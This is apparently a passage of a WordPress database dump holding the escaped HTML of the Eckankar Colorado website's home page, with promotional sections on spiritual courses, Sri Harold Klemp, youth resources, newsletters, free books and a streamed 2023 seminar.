data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242833,41180,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow 